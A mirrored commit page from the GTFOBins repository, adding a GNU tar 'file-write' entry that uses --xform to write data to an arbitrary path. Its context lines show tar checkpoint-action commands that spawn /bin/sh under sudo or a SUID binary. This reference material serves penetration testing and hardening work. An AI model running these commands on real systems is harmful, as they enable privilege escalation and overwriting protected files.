mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add tar file-write
This commit is contained in:
parent
2975d813d2
commit
1a739b4550
@ -6,4 +6,11 @@ functions:
|
|||||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||||
suid-limited:
|
suid-limited:
|
||||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||||
|
file-write:
|
||||||
|
- description: This only works for GNU tar.
|
||||||
|
code: |
|
||||||
|
LFILE=file_to_write
|
||||||
|
TF=$(mktemp)
|
||||||
|
echo data > "$TF"
|
||||||
|
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user